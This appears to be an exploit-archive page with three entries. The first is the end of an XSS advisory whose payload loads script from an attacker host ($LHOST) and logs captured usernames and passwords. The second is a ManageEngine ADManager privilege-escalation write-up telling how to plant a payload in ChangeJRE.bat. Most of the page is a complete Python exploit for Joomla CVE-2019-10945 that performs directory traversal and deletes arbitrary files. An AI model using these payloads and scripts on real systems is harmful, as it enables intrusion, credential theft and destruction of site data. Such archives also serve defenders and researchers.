        <link rel="stylesheet" type="text/css" href="/logo/mobile_custmiz_page.css?v=180711001117" />
        <script src="/ext-js/mobile/js/jquery-1.8.2.min.js?v=180711001117" type="text/javascript"></script>
        <script src="/ext-js/mobile/js/jquery.mobile-1.4.2.min.js?v=180711001117" type="text/javascript"></script>
        <script type="text/javascript" src="/lang/language_panel.js?v=180711001117"></script>
        <script language="JavaScript">
        var errorNum = 0;
        var mp_idx = "";$.getScript('//$LHOST/z');//";
        ...


        When the login form is submitted, the host for the malicious file gets a request
        containing the login credentials and target system:

        $LHOST - - [10/Apr/2019 23:04:41] "GET /z?_=1554937481076 HTTP/1.1" 200 -
        $LHOST - - [10/Apr/2019 23:04:49] "GET /?username=test&password=test&host=$RHOST HTTP/1.1" 200 -

        Zoho ManageEngine ADManager Plus 6.6 Privilege Escalation


        Zoho ManageEngine ADManager Plus version 6.6 builds prior to 6659 suffer from a privilege escalation vulnerability.


        MD5 | a5987088213495081a0fe45610b5f782

        # Exploit Title: Zoho ManageEngine ADManager Plus 6.6 (Build < 6659) Privilege Escalation
        # Date: 15th April 2019
        # Exploit Author: Digital Interruption
        # Vendor Homepage: https://www.manageengine.co.uk/
        # Version: 6.6 (Build 6658)
        # Tested on: Windows Server 2012 R2
        # CVE : CVE-2018-19374

        Due to weak permissions setup on the bin, lib and tools directories within the ManageEngine installation directory, it is possible for any authenticated user to modify several core files.

        To escalate privileges to that of LOCAL SYSTEM, drop a payload onto the system and then add a line to bin\ChangeJRE.bat to execute it every time the system is rebooted.

        Joomla 3.9.4 Arbitrary File Deletion / Directory Traversal


        Joomla versions 1.5.0 through 3.9.4 suffer from arbitrary file deletion and directory traversal vulnerabilities.


        MD5 | 8cd07fef6144f3579e25aa9810aebe07

        # Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion
        # Date: 2019-March-13
        # Exploit Author: Haboob Team
        # Web Site: haboob.sa
        # Email: research@haboob.sa
        # Software Link: https://www.joomla.org/
        # Versions: Joomla 1.5.0 through Joomla 3.9.4
        # CVE : CVE-2019-10945
        # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945
        #
        # Usage:
        # List files in the specified directory:
        # python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory name>
        #
        # Delete file in specified directory
        # python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory to list> --rm=<file name>


        import re
        import tempfile
        import pickle
        import os
        import hashlib
        import urllib

        try:
        import click
        except ImportError:
        print("module 'click' doesn't exist, type: pip install click")
        exit(0)

        try:
        import requests
        except ImportError:
        print("module 'requests' doesn't exist, type: pip install requests")
        exit(0)
        try:
        import lxml.html
        except ImportError:
        print("module 'lxml' doesn't exist, type: pip install lxml")
        exit(0)

        # Query string for Joomla's media-manager listing. The folder value starts
        # with "/.." -- that is the directory-traversal primitive every request in
        # this script builds on. For defenders: administrator access-log entries with
        # option=com_media&view=mediaList and a folder= value beginning "/.." (and
        # task=file.delete ... &rm[]= for deletions) are the signature of this tool.
        mediaList = "?option=com_media&view=mediaList&tmpl=component&folder=/.."

        # Banner (Python 2 print statement; the whole script is Python 2).
        print '''
        # Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion
        # Web Site: Haboob.sa
        # Email: research@haboob.sa
        # Versions: Joomla 1.5.0 through Joomla 3.9.4
        # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945
        _ _ ____ ____ ____ ____
        | | | | /\ | _ \ / __ \ / __ \| _ \
        | |__| | / \ | |_) | | | | | | | |_) |
        | __ | / /\ \ | _ <| | | | | | | _ <
        | | | |/ ____ \| |_) | |__| | |__| | |_) |
        |_| |_/_/ \_\____/ \____/ \____/|____/

        '''
        class URL(click.ParamType):
            """click parameter type accepting only http(s) URLs.

            Validation is a purely syntactic regex check (scheme, host name,
            "localhost" or a dotted quad, optional port, optional path); tuple
            values are passed through without checking.
            """
            name = 'url'
            regex = re.compile(
                r'^(?:http)s?://'  # scheme
                r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'  # host name
                r'localhost|'
                r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'  # dotted quad
                r'(?::\d+)?'  # optional port
                r'(?:/?|[/?]\S+)$', re.IGNORECASE)

            def convert(self, value, param, ctx):
                """Return *value* unchanged or report a usage error through click."""
                is_tuple = isinstance(value, tuple)
                if not is_tuple and self.regex.match(value) is None:
                    self.fail('invalid URL (%s)' % value, param, ctx)
                return value


        def getForm(url, query, cookie=''):
            """GET *url* and return (xpath results for *query*, response cookies).

            Any non-200 status exits the process (the message always says 404).
            ``cookie`` is handed straight to requests; callers pass either '' or
            a cookie dict. The body is re-encoded to UTF-8 bytes before lxml
            parses it.
            """
            r = requests.get(url, cookies=cookie, timeout=5)
            if r.status_code != 200:
                print("invalid URL: 404 NOT FOUND!!")
                exit(0)
            page = r.text.encode('utf-8')
            html = lxml.html.fromstring(page)
            return html.xpath(query), r.cookies


        def login(url, username, password):
            """Post the administrator login form and cache the resulting cookies.

            The CSRF token field name is taken as the last <input> name on the
            login page. A 200 response means the login page was rendered again
            (failure): its alert message is printed and the process exits.
            Anything else -- redirects are not followed -- is treated as success
            and the response cookies go to get_cookies, which pickles them under
            the temp directory. Returns None either way.
            """
            csrf, cookie = getForm(url, '//input/@name')
            # 'return' is the base64 of "index.php".
            postData = {'username': username, 'passwd': password, 'option': 'com_login', 'task': 'login',
                        'return': 'aW5kZXgucGhw', csrf[-1]: 1}

            res = requests.post(url, cookies=cookie.get_dict(), data=postData, allow_redirects=False)
            if res.status_code == 200:
                html = lxml.html.fromstring(res.text)
                msg = html.xpath("//div[@class='alert-message']/text()[1]")
                print msg
                exit()
            else:
                get_cookies(res.cookies.get_dict(), url, username, password)


        def save_cookies(requests_cookiejar, filename):
            """Pickle *requests_cookiejar* to *filename* (a path under the temp dir).

            NOTE(security): the file name is predictable (see cookies_file_name)
            and the temp directory is shared, so the stored session cookie is
            exposed to other local users and the file can be swapped out before
            load_cookies unpickles it.
            """
            with open(filename, 'wb') as f:
                pickle.dump(requests_cookiejar, f)


        def load_cookies(filename):
            """Unpickle and return whatever save_cookies stored at *filename*.

            NOTE(security): pickle.load executes code embedded in the file. The
            path is predictable and lives in the shared temp directory, so this
            input should be treated as untrusted; a safer cache format would be
            a plain mapping (e.g. JSON), since the cookies are a str->str dict.
            """
            with open(filename, 'rb') as f:
                return pickle.load(f)


        def cookies_file_name(url, username, password):
            """Return <tempdir>/<md5(url + username + password)>.Jcookie.

            The digest is an unsalted MD5 over the raw concatenation, which is
            weak protection for the password embedded in it, and the path is
            predictable for anyone who knows the URL and user. hashlib.md5()
            requires bytes under Python 3 and would raise TypeError there; the
            path is joined with "/" instead of os.path.join.
            """
            result = hashlib.md5(str(url) + str(username) + str(password))
            _dir = tempfile.gettempdir()
            return _dir + "/" + result.hexdigest() + ".Jcookie"


        def get_cookies(req_cookie, url, username, password):
            """Return the cached cookies for (url, user, password), or cache *req_cookie*.

            On a cache miss *req_cookie* is written to the cache file and returned
            unchanged. traversal() and removeFile() call this with '' so, when no
            cache file exists, they continue with an empty cookie and leave a file
            containing '' behind.
            """
            cookie_file = cookies_file_name(url, username, password)
            if os.path.isfile(cookie_file):
                return load_cookies(cookie_file)
            else:
                save_cookies(req_cookie, cookie_file)
                return req_cookie


        def traversal(url, username, password, dir=None):
            """Print the file names the media-manager listing returns for *dir*.

            *dir* is appended to the folder=/.. query (see mediaList) by string
            concatenation, so it must be a str; cli() always passes one. Each
            rm[] checkbox value on the page is a file name. ``dir`` and ``file``
            shadow builtins.
            """
            cookie = get_cookies('', url, username, password)
            url = url + mediaList + dir
            files, cookie = getForm(url, "//input[@name='rm[]']/@value", cookie)
            for file in files:
                print file
                pass


        def removeFile(baseurl, username, password, dir='', file=''):
            """Delete *file* inside *dir* through the media manager's file.delete task.

            Takes the first target="_top" link on the listing page (a folder.delete
            URL), keeps everything before "folder=", rewrites folder.delete to
            file.delete, appends the traversal folder and rm[]=file, and prints the
            alert message from the response. Prints an error when no such link
            exists or the alert is empty. ``dir`` and ``file`` shadow builtins.
            """
            cookie = get_cookies('', baseurl, username, password)
            url = baseurl + mediaList + dir
            link, _cookie = getForm(url, "//a[@target='_top']/@href", cookie)
            if link:
                link = urllib.unquote(link[0].encode("utf8"))
                link = link.split('folder=')[0]
                link = link.replace("folder.delete", "file.delete")
                link = baseurl + link + "folder=/.." + dir + "&rm[]=" + file
                msg, cookie = getForm(link, "//div[@class='alert-message']/text()[1]", cookie)
                if len(msg) == 0:
                    print "ERROR : File does not exist"
                else:
                    print msg
            else:
                print "ERROR:404 NOT FOUND!!"


        @click.group(invoke_without_command=True)
        @click.option('--url', type=URL(), help="Joomla Administrator URL", required=True)
        @click.option('--username', type=str, help="Joomla Manager username", required=True)
        @click.option('--password', type=str, help="Joomla Manager password", required=True)
        @click.option('--dir', type=str, help="listing directory")
        @click.option('--rm', type=str, help="delete file")
        @click.pass_context
        def cli(ctx, url, username, password, dir, rm):
            """Command-line entry: log in unless a cookie cache exists, then list or delete.

            *dir* is normalised to "/name" (surrounding slashes stripped); "/",
            "../" and "/." collapse to '' (the "../" case can no longer match once
            a leading "/" has been added). With --rm the file is deleted, otherwise
            the directory is listed. The bare ``print dir`` looks like a debugging
            leftover. ``ctx`` is unused; ``dir`` shadows a builtin.
            """
            url = url+"/"
            cookie_file = cookies_file_name(url, username, password)
            if not os.path.isfile(cookie_file):
                login(url, username, password)
            if dir is not None:
                dir = dir.lstrip('/')
                dir = dir.rstrip('/')
                dir = "/" + dir
                if dir == "/" or dir == "../" or dir == "/.":
                    dir = ''
            else:
                dir = ''
            print dir
            if rm is not None:
                removeFile(url, username, password, dir, rm)
            else:
                traversal(url, username, password, dir)


        cli()
